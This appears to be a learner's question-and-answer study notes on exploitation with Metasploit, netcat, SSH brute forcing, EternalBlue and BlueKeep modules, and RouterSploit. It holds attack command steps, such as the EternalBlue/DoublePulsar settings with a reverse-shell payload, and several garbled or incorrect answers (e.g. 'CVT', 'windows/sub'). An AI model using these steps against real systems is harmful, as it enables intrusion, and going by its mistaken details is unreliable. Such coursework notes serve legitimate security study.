Hacking - Section 8 - Exploitation and Gaining Access.

Question 1

What is exploitation?

Answer 1

Is to use the vulnerabilities found to send a payload (a program) to the target.

Question 2

What does the payload allows you to do?

Answer 2

Write commands directly into the target machine.

Question 3

What happens if the target doesn’t have any vulnerabilities?

Answer 3

You need to make them open a payload by themselves, by using emails, files, etc.

Question 4

What is a vulnerability?

Answer 4

Can be when a code of a software was not well written, which can be exploited by a the use of a bug in order to make it function differently (payload).

Question 5

What is a CVT and a zero day vulnerability?

Answer 5

CVT + a year / when it first occurred is a bug exploited vulnerability.
zero day is a vulnerab that has not been patched yet (not discovered).

Question 6

What is a shell?

Explain its two types:

Answer 6

shell = payload
reverse shell - target machine trying to connect back to the kali linux, exploit the target and drop a shell, which will tell the target machine to connect to our port.
bind shell - target machine opens their port for us to connect, but almost never work because firewalls can forbid target machines to open ports.

Question 7

How to open the metasploitable framkework list?

Answer 7

cd /usr/share/metasploitable-framework/

Question 8

How to open a metasploitable framkework file to see its code?

Answer 8

nano + name of it.

in the directory that they are

Question 9

How to open the msfconsole?

Answer 9

msfconsole

Question 10

How to show any section inside the msfconsole?

Answer 10

show + section you want

Question 11

How to show a section inside of msfconsole?

Answer 11

type: show + name of the section

ex - show payloads

Question 12

How to use a module?

Answer 12

use + section name + name of it

ex - use exploit/ + name you’ve copied

Question 13

After using a module, how can you know more about it?

Answer 13

show info

show options

Question 14

Inside the ‘show options’ command, if you want to change any info you can type:

Answer 14

set + name of option + new info

ex - set LHOST 192.168.7

Question 15

Inside the ‘module’, to show the payloads that will work for that command you can type:

And how to set a new payload?

Answer 15

show payloads

copy the one you desire (show payloads) and type:
set payload + its name
show options

Question 16

How to show the available targets inside the module?

and how to set one?

Answer 16

show targets

set target + number (then use exploit)

Question 17

How can you use a version explored in the searchsploit on the msfconsole?

Answer 17

If you find a path result with metasploit in it, you can use:
search + name of the version (on the msfconsole)

Question 18

How to exit the shell?

Answer 18

exit

Question 19

What is the ‘netcat’ tool and how to use it?

Answer 19

A tool that allows us to to establish a connection with other machines using TCP/UDP.
nc -h
nc + IP + Port Nº

Question 20

What are some rare exploits that barely happen but are guaranteed to exploy?

Answer 20

Bindshell and Tellnet.

Question 21

How to exploit a telnet?

Answer 21

telnet + IP

Question 22

How to run the commands on the msfconsole?

Answer 22

run

Question 23

How to search for a version of a exploit?

Answer 23

searchsploit + its name
msfconsole
use + the name you saw +/port that u desire
use + same thing as above + /the version u choose from msfconsole
run
ex - use auxiliary/scanner/smb/
use auxiliary/scanner/smb/ + /version u desire
set RGHOST
run

Question 24

What is a brute force attack?

Answer 24

Is to send information (usernames and passwords) to the target to check if any of those are correct.

Question 25

Why is the brute force attack used?

Answer 25

To check if the target has default credentials or weak passwords (or both).

Question 26

How to access ssh modules (msfconsole)

Answer 26

search ssh

Question 27

How to set a password/username file to use in a brutal force attack?

Answer 27

nano PASSWORDS.txt (write passwords inside of it)
nano USERNAMES.txt (write usernames inside of it)
(go to desktop and type pwd)
set PASS_FILE pwd + /PASSWORDS.txt
set USER_FILE pwd + /USERNAMES.txt
set VERBOSE TRUE
set RHOSTS + IP

Question 28

What does the command ‘session’ do?

and how to open (start) connection with one?

Answer 28

Will show you all the shells that you are connected.

sessions + -i + Nº of it

Question 29

What does the -p- command on the nmap mean?

Answer 29

Means it’ll access all ports of the machine.

ex - sudo nmap -sV + IP + -p-

Question 30

How to connect to a VNC port?

Answer 30

vncviewer + IP

password = password

Question 31

What is the port 445 on windows?

Answer 31

A port that is always open, mainly on companies, because it is used to share files and data between the companies computers.

Question 32

What does the ‘getuid’ command stands for on windows?

Answer 32

It will tell u the ‘account’ that u are positioned.

NT AUTHORITY\SYSTEM is the highest one.

Question 33

How to show all the files including the hidden directories on a ls command?

Answer 33

ls -la

Question 34

How to execute the eternalblue_doublepulsar on msfconsole?

Answer 34

use windows/sub/eternalblue_doublepulsar
processinject - lsass.exe (for 64x machines)
RHOSTS - target IP
targetarchitecture - 64x (for 64x machines)
payload - (windows/x64/meterpreter/reverse_tcp)

Question 35

What is a RCE?

Answer 35

Remote code execution

meaning that the attacker does not have to authenticate in order to write codes on the machine.

Question 36

What is the port that is frequently opened into big companies but not on home devices?

Answer 36

port 3389

Question 37

What can you do to check if a target is vulnerable?

Answer 37

You can use an auxiliary module of the specific vulnerability that you intend to deploy.

Question 38

How to use the bluekeep exploit?

Answer 38

search bluekeep
use it
set RHOSTS (need port 3389 opened)

Question 39

What happens if you invade a router?

Answer 39

You’ll get access to the whole network.

Question 40

Why are routers the easiest devices to hack?

Answer 40

Because most of them (home routers) have default login passwords.

Question 41

How to open the ‘routersploit’ command?

Answer 41

rsf.py

Question 42

What does the /autopwn scan do?

Answer 42

It scans the router for several vulnerabilities and see if any of them are exploitable.